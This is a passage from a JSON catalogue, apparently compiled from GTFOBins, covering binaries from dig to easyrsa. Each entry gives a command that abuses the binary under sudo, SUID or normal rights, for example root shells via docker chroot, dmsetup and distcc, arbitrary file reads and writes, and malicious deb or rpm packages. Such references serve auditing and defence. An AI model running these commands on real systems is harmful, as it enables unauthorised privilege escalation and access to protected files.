/path/to/input-file","description":"Each input line is treated as a lookup query for the `dig` command and the output is corrupted with the result or errors of the operation.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dig/"]},{"id":"gtfo:dig:file-read:0:unprivileged","toolId":"gtfo:dig","toolName":"dig","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dig -f /path/to/input-file","description":"Each input line is treated as a lookup query for the `dig` command and the output is corrupted with the result or errors of the operation.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dig/"]},{"id":"gtfo:distcc:shell:0:sudo","toolId":"gtfo:distcc","toolName":"distcc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"distcc /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/distcc/"]},{"id":"gtfo:distcc:shell:0:suid","toolId":"gtfo:distcc","toolName":"distcc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"distcc /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/distcc/"]},{"id":"gtfo:distcc:shell:0:unprivileged","toolId":"gtfo:distcc","toolName":"distcc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"distcc /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/distcc/"]},{"id":"gtfo:dmesg:file-read:0:sudo","toolId":"gtfo:dmesg","toolName":"dmesg","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dmesg -rF /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dmesg/"]},{"id":"gtfo:dmesg:file-read:0:suid","toolId":"gtfo:dmesg","toolName":"dmesg","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dmesg -rF /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dmesg/"]},{"id":"gtfo:dmesg:file-read:0:unprivileged","toolId":"gtfo:dmesg","toolName":"dmesg","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dmesg -rF /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmesg/"]},{"id":"gtfo:dmesg:inherit:0:sudo","toolId":"gtfo:dmesg","toolName":"dmesg","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dmesg -H","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dmesg/"]},{"id":"gtfo:dmesg:inherit:0:suid","toolId":"gtfo:dmesg","toolName":"dmesg","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dmesg -H","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dmesg/"]},{"id":"gtfo:dmesg:inherit:0:unprivileged","toolId":"gtfo:dmesg","toolName":"dmesg","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"dmesg -H","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmesg/"]},{"id":"gtfo:dmidecode:file-write:0:unprivileged","toolId":"gtfo:dmidecode","toolName":"dmidecode","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dmidecode --no-sysfs -d x.dmi --dump-bin /path/to/output-file","description":"It can be used to write files using a specially crafted SMBIOS file that can be read as a memory device by dmidecode.\nGenerate the file with [dmiwrite](https://github.com/adamreiser/dmiwrite) and upload it to the target.\n\n- `--dump-bin`, will cause dmidecode to write the payload to the destination specified, prepended with 32 null bytes.\n\n- `--no-sysfs`, if the target system is using an older version of dmidecode, you may need to omit the option.\n\n```\nmake dmiwrite\necho DATA >/path/to/temp-file\n./dmiwrite /path/to/temp-file x.dmi\n```","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmidecode/"]},{"id":"gtfo:dmsetup:shell:0:sudo","toolId":"gtfo:dmsetup","toolName":"dmsetup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\ndmsetup ls --exec '/bin/sh -s'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dmsetup/"]},{"id":"gtfo:dmsetup:shell:0:suid","toolId":"gtfo:dmsetup","toolName":"dmsetup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\ndmsetup ls --exec '/bin/sh -p -s'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dmsetup/"]},{"id":"gtfo:dmsetup:shell:0:unprivileged","toolId":"gtfo:dmsetup","toolName":"dmsetup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\ndmsetup ls --exec '/bin/sh -s'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmsetup/"]},{"id":"gtfo:dnf:command:0:sudo","toolId":"gtfo:dnf","toolName":"dnf","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"dnf install -y x-1.0-1.noarch.rpm --disablerepo=*","description":"Generate the RPM package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho /path/to/command >x.sh\nfpm -n x -s dir -t rpm -a all --before-install x.sh .\n```\n\nThe `--disablerepo=*` option is used for targets without Internet connectivity, can be omitted otherwise.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dnf/"]},{"id":"gtfo:dnsmasq:command:0:sudo","toolId":"gtfo:dnsmasq","toolName":"dnsmasq","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"dnsmasq --conf-script='/path/to/command 1>&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dnsmasq/"]},{"id":"gtfo:dnsmasq:command:0:suid","toolId":"gtfo:dnsmasq","toolName":"dnsmasq","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"dnsmasq --conf-script='/path/to/command 1>&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dnsmasq/"]},{"id":"gtfo:dnsmasq:command:0:unprivileged","toolId":"gtfo:dnsmasq","toolName":"dnsmasq","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"dnsmasq --conf-script='/path/to/command 1>&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dnsmasq/"]},{"id":"gtfo:doas:shell:0:sudo","toolId":"gtfo:doas","toolName":"doas","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"doas -u root /bin/sh","description":"The user must be allowed to use `doas`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/doas/"]},{"id":"gtfo:doas:shell:0:unprivileged","toolId":"gtfo:doas","toolName":"doas","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"doas -u root /bin/sh","description":"The user must be allowed to use `doas`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/doas/"]},{"id":"gtfo:docker:file-read:0:sudo","toolId":"gtfo:docker","toolName":"docker","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"docker cp /path/to/input-file $CONTAINER_ID:input-file\ndocker cp $CONTAINER_ID:input-file /path/to/temp-file\ncat /path/to/temp-file","description":"Read a file by copying it to a temporary container (`$CONTAINER_ID`) and back to a new location on the host.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:file-read:0:suid","toolId":"gtfo:docker","toolName":"docker","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"docker cp /path/to/input-file $CONTAINER_ID:input-file\ndocker cp $CONTAINER_ID:input-file /path/to/temp-file\ncat /path/to/temp-file","description":"Read a file by copying it to a temporary container (`$CONTAINER_ID`) and back to a new location on the host.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:file-read:0:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"docker cp /path/to/input-file $CONTAINER_ID:input-file\ndocker cp $CONTAINER_ID:input-file /path/to/temp-file\ncat /path/to/temp-file","description":"Read a file by copying it to a temporary container (`$CONTAINER_ID`) and back to a new location on the host.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:file-write:0:sudo","toolId":"gtfo:docker","toolName":"docker","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ndocker cp /path/to/temp-file $CONTAINER_ID:temp-file\ndocker cp $CONTAINER_ID /path/to/output-file","description":"Write a file by copying it to a temporary container (`$CONTAINER_ID`) and back to the target destination on the host.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:file-write:0:suid","toolId":"gtfo:docker","toolName":"docker","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ndocker cp /path/to/temp-file $CONTAINER_ID:temp-file\ndocker cp $CONTAINER_ID /path/to/output-file","description":"Write a file by copying it to a temporary container (`$CONTAINER_ID`) and back to the target destination on the host.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:file-write:0:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ndocker cp /path/to/temp-file $CONTAINER_ID:temp-file\ndocker cp $CONTAINER_ID /path/to/output-file","description":"Write a file by copying it to a temporary container (`$CONTAINER_ID`) and back to the target destination on the host.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:shell:0:sudo","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:shell:0:suid","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:shell:0:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:shell:1:sudo","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run --rm -it --privileged -u root alpine\nmount /dev/sda1 /mnt/\nls -la /mnt/\nchroot /mnt /bin/bash","description":"This exploits the fact that is run with the `--privileged` option to directly mount a host's disk, e.g., `/dev/sda1`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:shell:1:suid","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run --rm -it --privileged -u root alpine\nmount /dev/sda1 /mnt/\nls -la /mnt/\nchroot /mnt /bin/bash","description":"This exploits the fact that is run with the `--privileged` option to directly mount a host's disk, e.g., `/dev/sda1`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:shell:1:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"docker run --rm -it --privileged -u root alpine\nmount /dev/sda1 /mnt/\nls -la /mnt/\nchroot /mnt /bin/bash","description":"This exploits the fact that is run with the `--privileged` option to directly mount a host's disk, e.g., `/dev/sda1`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:dos2unix:file-read:0:sudo","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dos2unix -f -O /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dos2unix/"]},{"id":"gtfo:dos2unix:file-read:0:suid","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dos2unix -f -O /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dos2unix/"]},{"id":"gtfo:dos2unix:file-read:0:unprivileged","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dos2unix -f -O /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dos2unix/"]},{"id":"gtfo:dos2unix:file-write:0:sudo","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dos2unix -f -n /path/to/input-file /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dos2unix/"]},{"id":"gtfo:dos2unix:file-write:0:suid","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dos2unix -f -n /path/to/input-file /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dos2unix/"]},{"id":"gtfo:dos2unix:file-write:0:unprivileged","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dos2unix -f -n /path/to/input-file /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dos2unix/"]},{"id":"gtfo:dosbox:file-read:0:sudo","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'type c:\\path\\to\\input'","description":"The file content will be displayed in the DOSBox graphical window.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-read:0:suid","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'type c:\\path\\to\\input'","description":"The file content will be displayed in the DOSBox graphical window.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-read:0:unprivileged","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'type c:\\path\\to\\input'","description":"The file content will be displayed in the DOSBox graphical window.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-read:1:sudo","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'copy c:\\path\\to\\input c:\\path\\to\\output' -c exit\ncat /path/to/OUTPUT","description":"The file is copied to a readable location.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-read:1:suid","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'copy c:\\path\\to\\input c:\\path\\to\\output' -c exit\ncat /path/to/OUTPUT","description":"The file is copied to a readable location.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-read:1:unprivileged","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'copy c:\\path\\to\\input c:\\path\\to\\output' -c exit\ncat /path/to/OUTPUT","description":"The file is copied to a readable location.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-write:0:sudo","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dosbox -c 'mount c /' -c \"echo DATA >c:\\path\\to\\output\" -c exit","description":"Note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-write:0:suid","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dosbox -c 'mount c /' -c \"echo DATA >c:\\path\\to\\output\" -c exit","description":"Note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-write:0:unprivileged","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dosbox -c 'mount c /' -c \"echo DATA >c:\\path\\to\\output\" -c exit","description":"Note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dotnet:file-read:0:sudo","toolId":"gtfo:dotnet","toolName":"dotnet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dotnet fsi\nSystem.IO.File.ReadAllText(\"/path/to/input-file\");;","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dotnet/"]},{"id":"gtfo:dotnet:file-read:0:unprivileged","toolId":"gtfo:dotnet","toolName":"dotnet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dotnet fsi\nSystem.IO.File.ReadAllText(\"/path/to/input-file\");;","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dotnet/"]},{"id":"gtfo:dotnet:shell:0:sudo","toolId":"gtfo:dotnet","toolName":"dotnet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dotnet fsi\nSystem.Diagnostics.Process.Start(\"/bin/sh\").WaitForExit();;","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dotnet/"]},{"id":"gtfo:dotnet:shell:0:unprivileged","toolId":"gtfo:dotnet","toolName":"dotnet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dotnet fsi\nSystem.Diagnostics.Process.Start(\"/bin/sh\").WaitForExit();;","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dotnet/"]},{"id":"gtfo:dpkg:inherit:0:sudo","toolId":"gtfo:dpkg","toolName":"dpkg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dpkg -l","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dpkg/"]},{"id":"gtfo:dpkg:inherit:0:suid","toolId":"gtfo:dpkg","toolName":"dpkg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dpkg -l","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dpkg/"]},{"id":"gtfo:dpkg:inherit:0:unprivileged","toolId":"gtfo:dpkg","toolName":"dpkg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"dpkg -l","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dpkg/"]},{"id":"gtfo:dpkg:shell:0:sudo","toolId":"gtfo:dpkg","toolName":"dpkg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dpkg -i x_1.0_all.deb","description":"Generate the Debian package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho 'exec /bin/sh' >x.sh\nfpm -n x -s dir -t deb -a all --before-install x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dpkg/"]},{"id":"gtfo:dstat:inherit:0:sudo","toolId":"gtfo:dstat","toolName":"dstat","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"dstat --xxx","description":"`dstat` allows you to run arbitrary Python scripts loaded as \"external plugins\" if they are located in one of the directories, stated in the `dstat` man page under \"FILES\":\n\n- `~/.dstat/`\n- `(path of binary)/plugins/`\n- `/usr/share/dstat/`\n- `/usr/local/share/dstat/`\n\nPick the one that you can write into. The plugin named `xxx` file name must be defined in the `dstat_xxx.py` file.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dstat/"]},{"id":"gtfo:dstat:inherit:0:unprivileged","toolId":"gtfo:dstat","toolName":"dstat","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"dstat --xxx","description":"`dstat` allows you to run arbitrary Python scripts loaded as \"external plugins\" if they are located in one of the directories, stated in the `dstat` man page under \"FILES\":\n\n- `~/.dstat/`\n- `(path of binary)/plugins/`\n- `/usr/share/dstat/`\n- `/usr/local/share/dstat/`\n\nPick the one that you can write into. The plugin named `xxx` file name must be defined in the `dstat_xxx.py` file.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dstat/"]},{"id":"gtfo:dvips:shell:0:sudo","toolId":"gtfo:dvips","toolName":"dvips","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dvips -R0 texput.dvi","description":"The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.\n\n```\ntex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dvips/"]},{"id":"gtfo:dvips:shell:0:suid","toolId":"gtfo:dvips","toolName":"dvips","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dvips -R0 texput.dvi","description":"The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.\n\n```\ntex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dvips/"]},{"id":"gtfo:dvips:shell:0:unprivileged","toolId":"gtfo:dvips","toolName":"dvips","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dvips -R0 texput.dvi","description":"The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.\n\n```\ntex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\n```","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dvips/"]},{"id":"gtfo:easy_install:inherit:0:sudo","toolId":"gtfo:easy_install","toolName":"easy_install","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >setup.py\neasy_install .","description":"This allows to run Python code (`...`). It executes a Python script named `setup.py` in the directory passed as argument (`.`).\n\nKeep in mind that the TTY is lost, so `/dev/tty` can be used, for example:\n\n```\necho 'import os; os.system(\"exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty\")' >setup.py\n```","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/easy_install/"]},{"id":"gtfo:easy_install:inherit:0:unprivileged","toolId":"gtfo:easy_install","toolName":"easy_install","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >setup.py\neasy_install .","description":"This allows to run Python code (`...`). It executes a Python script named `setup.py` in the directory passed as argument (`.`).\n\nKeep in mind that the TTY is lost, so `/dev/tty` can be used, for example:\n\n```\necho 'import os; os.system(\"exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty\")' >setup.py\n```","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/easy_install/"]},{"id":"gtfo:easyrsa:shell:0:sudo","toolId":"gtfo:easyrsa","toolName":"easyrsa","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'set_var X \"$(/bin/sh 